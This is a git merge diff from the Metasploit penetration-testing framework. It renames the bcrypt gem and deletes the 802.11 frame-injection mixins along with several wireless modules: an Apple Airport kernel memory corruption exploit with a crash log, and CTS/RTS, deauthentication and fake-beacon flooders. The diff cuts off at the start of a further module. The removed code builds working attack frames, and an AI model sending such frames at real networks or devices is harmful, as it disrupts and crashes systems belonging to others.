Merge branch 'staging/electro_release' into feature/ssh_login_scanner
commit
7d05de935e
2
Gemfile
2
Gemfile
|
@ -3,7 +3,7 @@ source 'https://rubygems.org'
|
||||||
# Need 3+ for ActiveSupport::Concern
|
# Need 3+ for ActiveSupport::Concern
|
||||||
gem 'activesupport', '>= 3.0.0'
|
gem 'activesupport', '>= 3.0.0'
|
||||||
# Needed for some admin modules (cfme_manageiq_evm_pass_reset.rb)
|
# Needed for some admin modules (cfme_manageiq_evm_pass_reset.rb)
|
||||||
gem 'bcrypt-ruby'
|
gem 'bcrypt'
|
||||||
# Needed for some admin modules (scrutinizer_add_user.rb)
|
# Needed for some admin modules (scrutinizer_add_user.rb)
|
||||||
gem 'json'
|
gem 'json'
|
||||||
# Needed by msfgui and other rpc components
|
# Needed by msfgui and other rpc components
|
||||||
|
|
|
@ -13,7 +13,7 @@ GEM
|
||||||
i18n (~> 0.6, >= 0.6.4)
|
i18n (~> 0.6, >= 0.6.4)
|
||||||
multi_json (~> 1.0)
|
multi_json (~> 1.0)
|
||||||
arel (3.0.2)
|
arel (3.0.2)
|
||||||
bcrypt-ruby (3.1.2)
|
bcrypt (3.1.7)
|
||||||
builder (3.0.4)
|
builder (3.0.4)
|
||||||
database_cleaner (1.1.1)
|
database_cleaner (1.1.1)
|
||||||
diff-lcs (1.2.4)
|
diff-lcs (1.2.4)
|
||||||
|
@ -63,7 +63,7 @@ PLATFORMS
|
||||||
DEPENDENCIES
|
DEPENDENCIES
|
||||||
activerecord
|
activerecord
|
||||||
activesupport (>= 3.0.0)
|
activesupport (>= 3.0.0)
|
||||||
bcrypt-ruby
|
bcrypt
|
||||||
database_cleaner
|
database_cleaner
|
||||||
factory_girl (>= 4.1.0)
|
factory_girl (>= 4.1.0)
|
||||||
fivemat (= 1.2.1)
|
fivemat (= 1.2.1)
|
||||||
|
|
2
LICENSE
2
LICENSE
|
@ -176,7 +176,7 @@ Files: arel
|
||||||
Copyright: 2007-2010 Nick Kallen, Bryan Helmkamp, Emilio Tagua, Aaron Patterson
|
Copyright: 2007-2010 Nick Kallen, Bryan Helmkamp, Emilio Tagua, Aaron Patterson
|
||||||
License: MIT
|
License: MIT
|
||||||
|
|
||||||
Files: bcrypt-ruby
|
Files: bcrypt
|
||||||
Copyright: 2007-2011 Coda Hale
|
Copyright: 2007-2011 Coda Hale
|
||||||
License: MIT
|
License: MIT
|
||||||
|
|
||||||
|
|
|
@ -1,127 +0,0 @@
|
||||||
# -*- coding: binary -*-
|
|
||||||
module Msf
|
|
||||||
|
|
||||||
###
|
|
||||||
#
|
|
||||||
# This module provides methods for sending raw 802.11 frames using the ruby-lorcon extension.
|
|
||||||
# Please see the ruby-lorcon documentation for more information.
|
|
||||||
#
|
|
||||||
###
|
|
||||||
|
|
||||||
module Exploit::Lorcon
|
|
||||||
|
|
||||||
#
|
|
||||||
# Initializes an instance of an exploit module that accesses a 802.11 network
|
|
||||||
#
|
|
||||||
def initialize(info = {})
|
|
||||||
super
|
|
||||||
|
|
||||||
|
|
||||||
default_intf = 'ath0'
|
|
||||||
default_driver = 'madwifing'
|
|
||||||
|
|
||||||
|
|
||||||
if (Rex::Compat.is_windows())
|
|
||||||
# Default to the the first airpcap device on Windows
|
|
||||||
default_intf = "\\\\.\\airpcap00"
|
|
||||||
|
|
||||||
# Default to the airpcap driver on Windows
|
|
||||||
default_driver = 'airpcap'
|
|
||||||
end
|
|
||||||
|
|
||||||
register_options(
|
|
||||||
[
|
|
||||||
OptString.new('INTERFACE', [true, 'The name of the wireless interface', default_intf]),
|
|
||||||
OptString.new('DRIVER', [true, 'The name of the wireless driver for lorcon', default_driver]),
|
|
||||||
OptInt.new('CHANNEL', [true, 'The default channel number', 11]),
|
|
||||||
OptInt.new('TXRATE', [true, 'The injected transmit rate', 2]),
|
|
||||||
OptEnum.new('TXMOD', [true, 'The injected modulation type', 'DSSS', %w{DEFAULT FHSS DSSS OFDM TURBO MIMO MIMOGF}])
|
|
||||||
], Msf::Exploit::Lorcon
|
|
||||||
)
|
|
||||||
|
|
||||||
|
|
||||||
begin
|
|
||||||
|
|
||||||
if(Rex::Compat.is_windows())
|
|
||||||
airpcap = Rex::FileUtils.find_full_path("airpcap.dll")
|
|
||||||
if (not airpcap)
|
|
||||||
raise RuntimeError, "The airpcap.dll library must be installed"
|
|
||||||
end
|
|
||||||
end
|
|
||||||
|
|
||||||
require 'Lorcon'
|
|
||||||
@lorcon_loaded = true
|
|
||||||
|
|
||||||
rescue ::Exception => e
|
|
||||||
@lorcon_loaded = false
|
|
||||||
@lorcon_error = e
|
|
||||||
end
|
|
||||||
|
|
||||||
end
|
|
||||||
|
|
||||||
#
|
|
||||||
# Opens a handle to the specified wireless device
|
|
||||||
#
|
|
||||||
def open_wifi
|
|
||||||
|
|
||||||
if (not @lorcon_loaded)
|
|
||||||
print_status("The Lorcon module is not available: #{@lorcon_error}")
|
|
||||||
raise RuntimeError, "Lorcon not available"
|
|
||||||
end
|
|
||||||
|
|
||||||
# XXX: Force the interface to be up
|
|
||||||
system("ifconfig", datastore['INTERFACE'], "up")
|
|
||||||
|
|
||||||
self.wifi = ::Lorcon::Device.new(datastore['INTERFACE'], datastore['DRIVER'])
|
|
||||||
if (not self.wifi)
|
|
||||||
raise RuntimeError, "Could not open the wireless device interface"
|
|
||||||
end
|
|
||||||
|
|
||||||
# Configure the card for reliable injection
|
|
||||||
self.wifi.fmode = "INJECT"
|
|
||||||
self.wifi.channel = (datastore['CHANNEL'] || 11).to_i
|
|
||||||
|
|
||||||
|
|
||||||
# Configure modulation
|
|
||||||
begin
|
|
||||||
self.wifi.modulation = datastore['TXMOD']
|
|
||||||
rescue ::ArgumentError => e
|
|
||||||
print_status("Warning: #{e}")
|
|
||||||
end
|
|
||||||
|
|
||||||
# Configure the transmission rate
|
|
||||||
begin
|
|
||||||
self.wifi.txrate = datastore['TXRATE'].to_i if datastore['TXRATE']
|
|
||||||
rescue ::ArgumentError => e
|
|
||||||
print_status("Warning: #{e}")
|
|
||||||
end
|
|
||||||
|
|
||||||
self.wifi
|
|
||||||
end
|
|
||||||
|
|
||||||
def close_wifi
|
|
||||||
self.wifi = nil
|
|
||||||
end
|
|
||||||
|
|
||||||
#
|
|
||||||
# Converts ethernet addresses to binary
|
|
||||||
#
|
|
||||||
def eton(addr)
|
|
||||||
addr.split(':').map { |c| c.hex.chr }.join
|
|
||||||
end
|
|
||||||
|
|
||||||
def channel
|
|
||||||
self.wifi.channel
|
|
||||||
end
|
|
||||||
|
|
||||||
def next_channel
|
|
||||||
cur = self.wifi.channel
|
|
||||||
nxt = (cur > 10) ? 1 : cur + 1
|
|
||||||
self.wifi.channel = nxt
|
|
||||||
end
|
|
||||||
|
|
||||||
attr_accessor :wifi
|
|
||||||
|
|
||||||
end
|
|
||||||
|
|
||||||
end
|
|
|
@ -1,141 +0,0 @@
|
||||||
# -*- coding: binary -*-
|
|
||||||
module Msf
|
|
||||||
|
|
||||||
###
|
|
||||||
#
|
|
||||||
# This module provides methods for sending raw 802.11 frames using the
|
|
||||||
# ruby-lorco2n extension.
|
|
||||||
# Please see the ruby-lorcon documentation for more information.
|
|
||||||
#
|
|
||||||
###
|
|
||||||
|
|
||||||
module Exploit::Lorcon2
|
|
||||||
|
|
||||||
#
|
|
||||||
# Initializes an instance of an exploit module that accesses a 802.11 network
|
|
||||||
#
|
|
||||||
|
|
||||||
def initialize(info = {})
|
|
||||||
super
|
|
||||||
|
|
||||||
default_intf = 'wlan0'
|
|
||||||
default_driver = 'autodetect'
|
|
||||||
|
|
||||||
if (Rex::Compat.is_windows())
|
|
||||||
# Default to the the first airpcap device on Windows
|
|
||||||
default_intf = "\\\\.\\airpcap00"
|
|
||||||
|
|
||||||
# Default to the airpcap driver on Windows
|
|
||||||
default_driver = 'airpcap'
|
|
||||||
end
|
|
||||||
|
|
||||||
register_options(
|
|
||||||
[
|
|
||||||
OptString.new('INTERFACE', [true, 'The name of the wireless interface', default_intf]),
|
|
||||||
OptString.new('DRIVER', [true, 'The name of the wireless driver for lorcon', default_driver]),
|
|
||||||
OptInt.new('CHANNEL', [true, 'The initial channel', 11]),
|
|
||||||
], Msf::Exploit::Lorcon2
|
|
||||||
)
|
|
||||||
|
|
||||||
|
|
||||||
begin
|
|
||||||
|
|
||||||
if(Rex::Compat.is_windows())
|
|
||||||
airpcap = Rex::FileUtils.find_full_path("airpcap.dll")
|
|
||||||
if (not airpcap)
|
|
||||||
raise RuntimeError, "The airpcap.dll library must be installed"
|
|
||||||
end
|
|
||||||
end
|
|
||||||
|
|
||||||
require 'Lorcon2'
|
|
||||||
@lorcon_loaded = true
|
|
||||||
|
|
||||||
rescue ::Exception => e
|
|
||||||
@lorcon_loaded = false
|
|
||||||
@lorcon_error = e
|
|
||||||
end
|
|
||||||
|
|
||||||
end
|
|
||||||
|
|
||||||
#
|
|
||||||
# Opens a handle to the specified wireless device
|
|
||||||
#
|
|
||||||
def open_wifi
|
|
||||||
|
|
||||||
if (not @lorcon_loaded)
|
|
||||||
print_status("The Lorcon2 module is not available: #{@lorcon_error}")
|
|
||||||
raise RuntimeError, "Lorcon2 not available"
|
|
||||||
end
|
|
||||||
|
|
||||||
if (datastore['DRIVER'] == "autodetect")
|
|
||||||
self.wifi = ::Lorcon::Device.new(datastore['INTERFACE'])
|
|
||||||
else
|
|
||||||
self.wifi = ::Lorcon::Device.new(datastore['INTERFACE'], datastore['DRIVER'])
|
|
||||||
end
|
|
||||||
|
|
||||||
if (not self.wifi)
|
|
||||||
raise RuntimeError, "Could not initialize the wireless device interface"
|
|
||||||
end
|
|
||||||
|
|
||||||
# Configure for injmon
|
|
||||||
self.wifi.openinjmon() or raise RuntimeError, "Could not open device in inject/monitor combo mode: " + self.wifi.error
|
|
||||||
|
|
||||||
# Configure channel
|
|
||||||
self.wifi.channel = datastore['CHANNEL']
|
|
||||||
|
|
||||||
# TODO - add mod/rate once lorcon2 supports it
|
|
||||||
|
|
||||||
self.wifi
|
|
||||||
end
|
|
||||||
|
|
||||||
#
|
|
||||||
# This monstrosity works around a series of bugs in the interrupt
|
|
||||||
# signal handling of Ruby 1.9 and Lorcon2
|
|
||||||
#
|
|
||||||
def each_packet(count=-1)
|
|
||||||
return if not wifi
|
|
||||||
begin
|
|
||||||
@wifi_count = 0
|
|
||||||
reader = framework.threads.spawn("Lorcon2Receiver", false) do
|
|
||||||
wifi.each_packet(count.to_i) do |pkt|
|
|
||||||
yield(pkt)
|
|
||||||
@wifi_count += 1
|
|
||||||
end
|
|
||||||
end
|
|
||||||
reader.join
|
|
||||||
rescue ::Exception
|
|
||||||
raise $!
|
|
||||||
ensure
|
|
||||||
reader.kill if reader.alive?
|
|
||||||
end
|
|
||||||
|
|
||||||
@wifi_count
|
|
||||||
end
|
|
||||||
|
|
||||||
def close_wifi
|
|
||||||
self.wifi = nil
|
|
||||||
end
|
|
||||||
|
|
||||||
#
|
|
||||||
# Converts ethernet addresses to binary
|
|
||||||
#
|
|
||||||
def eton(addr)
|
|
||||||
addr.split(':').map { |c| c.hex.chr }.join
|
|
||||||
end
|
|
||||||
|
|
||||||
def channel
|
|
||||||
self.wifi.channel
|
|
||||||
end
|
|
||||||
|
|
||||||
def next_channel
|
|
||||||
cur = self.wifi.channel
|
|
||||||
nxt = (cur > 10) ? 1 : cur + 1
|
|
||||||
self.wifi.channel = nxt
|
|
||||||
end
|
|
||||||
|
|
||||||
attr_accessor :wifi
|
|
||||||
|
|
||||||
end
|
|
||||||
|
|
||||||
end
|
|
||||||
|
|
|
@ -71,8 +71,6 @@ require 'msf/core/exploit/dialup'
|
||||||
require 'msf/core/exploit/dect_coa'
|
require 'msf/core/exploit/dect_coa'
|
||||||
|
|
||||||
# Networks
|
# Networks
|
||||||
require 'msf/core/exploit/lorcon'
|
|
||||||
require 'msf/core/exploit/lorcon2'
|
|
||||||
require 'msf/core/exploit/capture'
|
require 'msf/core/exploit/capture'
|
||||||
|
|
||||||
# FileFormat
|
# FileFormat
|
||||||
|
|
|
@ -1,162 +0,0 @@
|
||||||
##
|
|
||||||
# This module requires Metasploit: http//metasploit.com/download
|
|
||||||
# Current source: https://github.com/rapid7/metasploit-framework
|
|
||||||
##
|
|
||||||
|
|
||||||
|
|
||||||
require 'msf/core'
|
|
||||||
|
|
||||||
|
|
||||||
class Metasploit3 < Msf::Auxiliary
|
|
||||||
|
|
||||||
include Msf::Exploit::Lorcon2
|
|
||||||
include Msf::Auxiliary::Dos
|
|
||||||
|
|
||||||
def initialize(info = {})
|
|
||||||
super(update_info(info,
|
|
||||||
'Name' => 'Apple Airport 802.11 Probe Response Kernel Memory Corruption',
|
|
||||||
'Description' => %q{
|
|
||||||
The Apple Airport driver provided with Orinoco-based Airport cards (1999-2003 PowerBooks, iMacs)
|
|
||||||
is vulnerable to a remote memory corruption flaw. When the driver is placed into active scanning
|
|
||||||
mode, a malformed probe response frame can be used to corrupt internal kernel structures, leading
|
|
||||||
to arbitrary code execution. This vulnerability is triggered when a probe response frame is received
|
|
||||||
that does not contain valid information element (IE) fields after the fixed-length header. The data
|
|
||||||
following the fixed-length header is copied over internal kernel structures, resulting in memory
|
|
||||||
operations being performed on attacker-controlled pointer values.
|
|
||||||
},
|
|
||||||
|
|
||||||
'Author' => [ 'hdm' ],
|
|
||||||
'License' => MSF_LICENSE,
|
|
||||||
'References' =>
|
|
||||||
[
|
|
||||||
['CVE', '2006-5710'],
|
|
||||||
['OSVDB', '30180'],
|
|
||||||
]
|
|
||||||
))
|
|
||||||
register_options(
|
|
||||||
[
|
|
||||||
OptInt.new('COUNT', [ true, "The number of frames to send", 2000]),
|
|
||||||
OptString.new('ADDR_DST', [ true, "The MAC address of the target system"])
|
|
||||||
], self.class)
|
|
||||||
end
|
|
||||||
|
|
||||||
#
|
|
||||||
# This bug is easiest to trigger when the card has been placed into active scan mode:
|
|
||||||
# $ /System/Library/PrivateFrameworks/Apple80211.framework/Versions/A/Resources/airport -s -r 10000
|
|
||||||
#
|
|
||||||
|
|
||||||
def run
|
|
||||||
open_wifi
|
|
||||||
|
|
||||||
cnt = datastore['COUNT'].to_i
|
|
||||||
|
|
||||||
print_status("Creating malicious probe response frame...")
|
|
||||||
frame = create_frame()
|
|
||||||
|
|
||||||
print_status("Sending #{cnt} frames...")
|
|
||||||
cnt.times { wifi.write(frame) }
|
|
||||||
end
|
|
||||||
|
|
||||||
def create_frame
|
|
||||||
bssid = Rex::Text.rand_text(6)
|
|
||||||
seq = [rand(255)].pack('n')
|
|
||||||
caps = [rand(65535)].pack('n')
|
|
||||||
|
|
||||||
frame =
|
|
||||||
"\x50" + # type/subtype
|
|
||||||
"\x00" + # flags
|
|
||||||
"\x00\x00" + # duration
|
|
||||||
eton(datastore['ADDR_DST']) + # dst
|
|
||||||
bssid + # src
|
|
||||||
bssid + # bssid
|
|
||||||
seq + # seq
|
|
||||||
Rex::Text.rand_text(8) + # timestamp value
|
|
||||||
Rex::Text.rand_text(2) + # beacon interval
|
|
||||||
Rex::Text.rand_text(2) # capabilities
|
|
||||||
|
|
||||||
frame << [0x0defaced].pack('N') * ((1024-frame.length) / 4)
|
|
||||||
|
|
||||||
return frame
|
|
||||||
|
|
||||||
end
|
|
||||||
end
|
|
||||||
|
|
||||||
=begin
|
|
||||||
|
|
||||||
Tested on a 1.0Ghz PowerBook running 10.4.8 with the latest updates (Halloween, 2006)
|
|
||||||
|
|
||||||
Unresolved kernel trap(cpu 0): 0x300 - Data access DAR=0x000000000DEFACF7 PC=0x00000000007A2260
|
|
||||||
Latest crash info for cpu 0:
|
|
||||||
Exception state (sv=0x3AA12A00)
|
|
||||||
PC=0x007A2260; MSR=0x00009030; DAR=0x0DEFACF7; DSISR=0x40000000; LR=0x007A1D48; R1=0x17443B60; XCP=0x0000000C (0x300 - Data access)
|
|
||||||
Backtrace: 0x01BC80AC 0x007A1D48 0x0079FA54 0x0079FF94 0x0079FEBC 0x002D0B94 0x002CFA5C 0x000A9314
|
|
||||||
Kernel loadable modules in backtrace (with dependencies):
|
|
||||||
com.apple.driver.AppleAirPort(3.4.4)@0x797000
|
|
||||||
dependency: com.apple.iokit.IONetworkingFamily(1.5.0)@0x5f8000
|
|
||||||
Proceeding back via exception chain:
|
|
||||||
Exception state (sv=0x3AA12A00)
|
|
||||||
previously dumped as "Latest" state. skipping...
|
|
||||||
Exception state (sv=0x31F13A00)
|
|
||||||
PC=0x00000000; MSR=0x0000D030; DAR=0x00000000; DSISR=0x00000000; LR=0x00000000; R1=0x00000000; XCP=0x00000000 (Unknown)
|
|
||||||
|
|
||||||
Kernel version:
|
|
||||||
Darwin Kernel Version 8.8.0: Fri Sep 8 17:18:57 PDT 2006; root:xnu-792.12.6.obj~1/RELEASE_PPC
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
(gdb) showcurrentstacks
|
|
||||||
task vm_map ipc_space #acts pid proc command
|
|
||||||
0x01a73dd8 0x00cdaf3c 0x01a68ef0 38 0 0x003fb200 kernel_task
|
|
||||||
activation thread pri state wait_queue wait_event
|
|
||||||
0x01a7c000 0x01a7c000 82 R
|
|
||||||
reserved_stack=0x173b0000
|
|
||||||
kernel_stack=0x17440000
|
|
||||||
stacktop=0x17443b60
|
|
||||||
0x17443b60 0x1bc80ac
|
|
||||||
0x17443be0 0x7a1d48 <com.apple.driver.AppleAirPort + 0xad48>
|
|
||||||
0x17443c60 0x79fa54 <com.apple.driver.AppleAirPort + 0x8a54>
|
|
||||||
0x17443ce0 0x79ff94 <com.apple.driver.AppleAirPort + 0x8f94>
|
|
||||||
0x17443d90 0x79febc <com.apple.driver.AppleAirPort + 0x8ebc>
|
|
||||||
0x17443df0 0x2d0b94 <_ZN22IOInterruptEventSource12checkForWorkEv+184>
|
|
||||||
0x17443e40 0x2cfa5c <_ZN10IOWorkLoop10threadMainEv+104>
|
|
||||||
0x17443e90 0xa9314 <Call_continuation+20>
|
|
||||||
stackbottom=0x17443e90
|
|
||||||
|
|
||||||
|
|
||||||
(gdb) x/3i $pc
|
|
||||||
0x7a2260 <mhp.1762+3571640>: lbz r8,0(r2)
|
|
||||||
0x7a2264 <mhp.1762+3571644>: addi r2,r2,1
|
|
||||||
0x7a2268 <mhp.1762+3571648>: stw r2,0(r11)
|
|
||||||
|
|
||||||
(gdb) i r $r2
|
|
||||||
r2 0xdefacf7 233811191
|
|
||||||
|
|
||||||
(gdb) x/x $r11
|
|
||||||
0x17443bb8: 0x0defacf7
|
|
||||||
|
|
||||||
|
|
||||||
(gdb) bt
|
|
||||||
#0 0x007a2260 in mhp.1762 ()
|
|
||||||
#1 0x007a1d48 in mhp.1762 ()
|
|
||||||
warning: Previous frame identical to this frame (corrupt stack?)
|
|
||||||
#2 0x007a1d48 in mhp.1762 ()
|
|
||||||
#3 0x0079fa54 in mhp.1762 ()
|
|
||||||
#4 0x0079ff94 in mhp.1762 ()
|
|
||||||
#5 0x0079febc in mhp.1762 ()
|
|
||||||
#6 0x002d0b94 in IOInterruptEventSource::checkForWork (this=0x1d80d40) at /SourceCache/xnu/xnu-792.12.6/iokit/Kernel/IOInterruptEventSource.cpp:196
|
|
||||||
#7 0x002cfa5c in IOWorkLoop::threadMain (this=0x1d803c0) at /SourceCache/xnu/xnu-792.12.6/iokit/Kernel/IOWorkLoop.cpp:267
|
|
||||||
|
|
||||||
|
|
||||||
(gdb) x/40x $r1
|
|
||||||
0x17443b60: 0x17443be0 0x22424022 0x01bc80ac 0x00000038
|
|
||||||
0x17443b70: 0x00d43c54 0x0004ffff 0x01bc81f4 0x00000210
|
|
||||||
0x17443b80: 0x02275000 0x003d8000 0x004fa418 0x00365000
|
|
||||||
0x17443b90: 0x01d803c0 0x00033e88 0x01a7c01c 0x01a7c0a4
|
|
||||||
0x17443ba0: 0x0defaced 0x01bc8000 0x0227581e 0x0defacf7
|
|
||||||
0x17443bb0: 0x00000000 0x0227581e 0x0defacf7 0x00000001
|
|
||||||
0x17443bc0: 0x00000002 0x01bc81f4 0x00000000 0x00000000
|
|
||||||
0x17443bd0: 0x17443c10 0x01a858c0 0x17443be0 0x01d80d40
|
|
||||||
0x17443be0: 0x17443c60 0x01bc81f4 0x007a1d48 0x00000000
|
|
||||||
0x17443bf0: 0x17443c20 0x00008088 0x01bc8000 0x0227581e
|
|
||||||
|
|
||||||
=end
|
|
|
@ -1,78 +0,0 @@
|
||||||
##
|
|
||||||
# This module requires Metasploit: http//metasploit.com/download
|
|
||||||
# Current source: https://github.com/rapid7/metasploit-framework
|
|
||||||
##
|
|
||||||
|
|
||||||
require 'msf/core'
|
|
||||||
|
|
||||||
class Metasploit3 < Msf::Auxiliary
|
|
||||||
|
|
||||||
include Msf::Exploit::Lorcon2
|
|
||||||
include Msf::Auxiliary::Dos
|
|
||||||
|
|
||||||
def initialize(info ={})
|
|
||||||
super(update_info(info,
|
|
||||||
'Name' => 'Wireless CTS/RTS Flooder',
|
|
||||||
'Description' => %q{
|
|
||||||
This module sends 802.11 CTS/RTS requests to a specific wireless peer,
|
|
||||||
using the specified source address,
|
|
||||||
},
|
|
||||||
'Author' => [ 'Brad Antoniewicz' ],
|
|
||||||
'License' => MSF_LICENSE
|
|
||||||
))
|
|
||||||
|
|
||||||
register_options(
|
|
||||||
[
|
|
||||||
OptString.new('ADDR_DST',[true, "TARGET MAC (e.g 00:DE:AD:BE:EF:00)"]),
|
|
||||||
OptString.new('ADDR_SRC',[false, "Source MAC (not needed for CTS)"]),
|
|
||||||
OptString.new('TYPE',[true,"Type of Frame (RTS, CTS)",'RTS']),
|
|
||||||
OptInt.new('NUM',[true, "Number of frames to send",100])
|
|
||||||
],self.class)
|
|
||||||
end
|
|
||||||
|
|
||||||
def run
|
|
||||||
case datastore['TYPE'].upcase
|
|
||||||
when 'RTS'
|
|
||||||
if (!datastore['ADDR_SRC'])
|
|
||||||
print_error("FAILED: RTS Flood selected but ADDR_SRC not set!")
|
|
||||||
return
|
|
||||||
end
|
|
||||||
frame = create_rts()
|
|
||||||
when 'CTS'
|
|
||||||
|
|
||||||
frame = create_cts()
|
|
||||||
else
|
|
||||||
print_error("No TYPE selected!!")
|
|
||||||
return
|
|
||||||
end
|
|
||||||
|
|
||||||
open_wifi
|
|
||||||
print_status("Sending #{datastore['NUM']} #{datastore['TYPE'].upcase} frames.....")
|
|
||||||
|
|
||||||
datastore['NUM'].to_i.times do
|
|
||||||
wifi.write(frame)
|
|
||||||
end
|
|
||||||
|
|
||||||
end
|
|
||||||
def create_rts
|
|
||||||
|
|
||||||
frame =
|
|
||||||
"\xb4" + # Type/SubType
|
|
||||||
"\x00" + # Flags
|
|
||||||
"\xff\x7f" + # Duration
|
|
||||||
eton(datastore['ADDR_DST']) + # dst addr
|
|
||||||
eton(datastore['ADDR_SRC']) # src addr
|
|
||||||
|
|
||||||
return frame
|
|
||||||
end
|
|
||||||
def create_cts
|
|
||||||
|
|
||||||
frame =
|
|
||||||
"\xc4" + # Type/SubType
|
|
||||||
"\x00" + # Flags
|
|
||||||
"\xff\x7f" + # Duration
|
|
||||||
eton(datastore['ADDR_DST']) # dst addr
|
|
||||||
|
|
||||||
return frame
|
|
||||||
end
|
|
||||||
end
|
|
|
@ -1,65 +0,0 @@
|
||||||
##
|
|
||||||
# This module requires Metasploit: http//metasploit.com/download
|
|
||||||
# Current source: https://github.com/rapid7/metasploit-framework
|
|
||||||
##
|
|
||||||
|
|
||||||
require 'msf/core'
|
|
||||||
|
|
||||||
class Metasploit3 < Msf::Auxiliary
|
|
||||||
|
|
||||||
include Msf::Exploit::Lorcon2
|
|
||||||
include Msf::Auxiliary::Dos
|
|
||||||
|
|
||||||
def initialize(info ={})
|
|
||||||
super(update_info(info,
|
|
||||||
'Name' => 'Wireless DEAUTH Flooder',
|
|
||||||
'Description' => %q{
|
|
||||||
This module sends 802.11 DEAUTH requests to a specific wireless peer,
|
|
||||||
using the specified source address and source BSSID.
|
|
||||||
},
|
|
||||||
|
|
||||||
'Author' => [ 'Brad Antoniewicz' ],
|
|
||||||
'License' => MSF_LICENSE
|
|
||||||
))
|
|
||||||
|
|
||||||
register_options(
|
|
||||||
[
|
|
||||||
OptString.new('ADDR_DST',[true, "TARGET MAC (e.g 00:DE:AD:BE:EF:00)"]),
|
|
||||||
OptString.new('ADDR_SRC',[true, "Source MAC (e.g 00:DE:AD:BE:EF:00)"]),
|
|
||||||
OptString.new('ADDR_BSS',[true, "BSSID (e.g 00:DE:AD:BE:EF:00)"]),
|
|
||||||
OptInt.new('NUM',[true, "Number of frames to send",100])
|
|
||||||
],self.class)
|
|
||||||
end
|
|
||||||
|
|
||||||
def run
|
|
||||||
|
|
||||||
print_status("Creating Deauth frame with the following attributes:")
|
|
||||||
print_status("\tDST: #{datastore['ADDR_DST']}")
|
|
||||||
print_status("\tSRC: #{datastore['ADDR_SRC']}")
|
|
||||||
print_status("\tBSSID: #{datastore['ADDR_BSS']}")
|
|
||||||
|
|
||||||
open_wifi
|
|
||||||
|
|
||||||
print_status("Sending #{datastore['NUM']} frames.....")
|
|
||||||
|
|
||||||
datastore['NUM'].to_i.times do
|
|
||||||
wifi.write(create_deauth())
|
|
||||||
end
|
|
||||||
close_wifi
|
|
||||||
end
|
|
||||||
|
|
||||||
def create_deauth
|
|
||||||
|
|
||||||
seq = [rand(255)].pack('n')
|
|
||||||
frame =
|
|
||||||
"\xc0" + # Type/SubType
|
|
||||||
"\x00" + # Flags
|
|
||||||
"\x3a\x01" + # Duration
|
|
||||||
eton(datastore['ADDR_DST']) + # dst addr
|
|
||||||
eton(datastore['ADDR_SRC']) + # src addr
|
|
||||||
eton(datastore['ADDR_BSS']) + # BSSID
|
|
||||||
seq + # sequence number
|
|
||||||
"\x07\x00" # Reason Code (nonassoc. sta)
|
|
||||||
return frame
|
|
||||||
end
|
|
||||||
end
|
|
|
@ -1,90 +0,0 @@
|
||||||
##
|
|
||||||
# This module requires Metasploit: http//metasploit.com/download
|
|
||||||
# Current source: https://github.com/rapid7/metasploit-framework
|
|
||||||
##
|
|
||||||
|
|
||||||
|
|
||||||
require 'msf/core'
|
|
||||||
|
|
||||||
|
|
||||||
class Metasploit3 < Msf::Auxiliary
|
|
||||||
|
|
||||||
include Msf::Exploit::Lorcon2
|
|
||||||
include Msf::Auxiliary::Dos
|
|
||||||
|
|
||||||
|
|
||||||
def initialize(info = {})
|
|
||||||
super(update_info(info,
|
|
||||||
'Name' => 'Wireless Fake Access Point Beacon Flood',
|
|
||||||
'Description' => %q{
|
|
||||||
This module can advertise thousands of fake access
|
|
||||||
points, using random SSIDs and BSSID addresses. Inspired
|
|
||||||
by Black Alchemy's fakeap tool.
|
|
||||||
},
|
|
||||||
|
|
||||||
'Author' => [ 'hdm', 'kris katterjohn' ],
|
|
||||||
'License' => MSF_LICENSE
|
|
||||||
))
|
|
||||||
|
|
||||||
register_options([
|
|
||||||
OptInt.new('NUM', [false, "Number of beacons to send"]),
|
|
||||||
OptString.new('BSSID', [false, "Use this static BSSID (e.g. AA:BB:CC:DD:EE:FF)"]),
|
|
||||||
OptString.new('SSID', [false, "Use this static SSID"])
|
|
||||||
])
|
|
||||||
end
|
|
||||||
|
|
||||||
def run
|
|
||||||
open_wifi
|
|
||||||
print_status("Sending fake beacon frames...")
|
|
||||||
if datastore['NUM'].nil? or datastore['NUM'] == 0
|
|
||||||
wifi.write(create_frame()) while true
|
|
||||||
else
|
|
||||||
datastore['NUM'].times { wifi.write(create_frame()) }
|
|
||||||
end
|
|
||||||
end
|
|
||||||
|
|
||||||
def create_frame
|
|
||||||
|
|
||||||
ssid = datastore['SSID'] || Rex::Text.rand_text_alpha(rand(31)+1)
|
|
||||||
if datastore['BSSID']
|
|
||||||
bssid = eton(datastore['BSSID'])
|
|
||||||
else
|
|
||||||
bssid = Rex::Text.rand_text(6)
|
|
||||||
end
|
|
||||||
seq = [rand(255)].pack('n')
|
|
||||||
|
|
||||||
"\x80" + # type/subtype
|
|
||||||
"\x00" + # flags
|
|
||||||
"\x00\x00" + # duration
|
|
||||||
"\xff\xff\xff\xff\xff\xff" + # dst
|
|
||||||
bssid + # src
|
|
||||||
bssid + # bssid
|
|
||||||
seq + # seq
|
|
||||||
Rex::Text.rand_text(8) + # timestamp value
|
|
||||||
"\x64\x00" + # beacon interval
|
|
||||||
"\x00\x05" + # capability flags
|
|
||||||
|
|
||||||
# ssid tag
|
|
||||||
"\x00" + ssid.length.chr + ssid +
|
|
||||||
|
|
||||||
# supported rates
|
|
||||||
"\x01" + "\x08" + "\x82\x84\x8b\x96\x0c\x18\x30\x48" +
|
|
||||||
|
|
||||||
# current channel
|
|
||||||
"\x03" + "\x01" + datastore['CHANNEL'].to_i.chr +
|
|
||||||
|
|
||||||
# traffic indication map
|
|
||||||
"\x05" + "\x04" + "\x00\x01\x02\x20" +
|
|
||||||
|
|
||||||
# country information
|
|
||||||
"\x07" + "\x06" + "\x55\x53\x20\x01\x0b\x12" +
|
|
||||||
|
|
||||||
# erp information
|
|
||||||
"\x2a" + "\x01" + "\x00" +
|
|
||||||
|
|
||||||
# extended supported rates
|
|
||||||
"\x32" + "\x04" + "\x12\x24\x60\x6c"
|
|
||||||
|
|
||||||
end
|
|
||||||
|
|
||||||
end
|
|
|
@ -1,110 +0,0 @@
|
||||||
##
|
|
||||||
# This module requires Metasploit: http//metasploit.com/download
|
|
||||||
# Current source: https://github.com/rapid7/metasploit-framework
|
|
||||||
##
|
|
||||||
|
|
||||||
require 'msf/core'
|
|
||||||
|
|
||||||
class Metasploit3 < Msf::Auxiliary
|
|
||||||
|
|
||||||
include Msf::Exploit::Lorcon2
|
|
||||||
include Msf::Auxiliary::Dos
|
|
||||||
|
|
||||||
def initialize(info = {})
|
|
||||||
super(update_info(info,
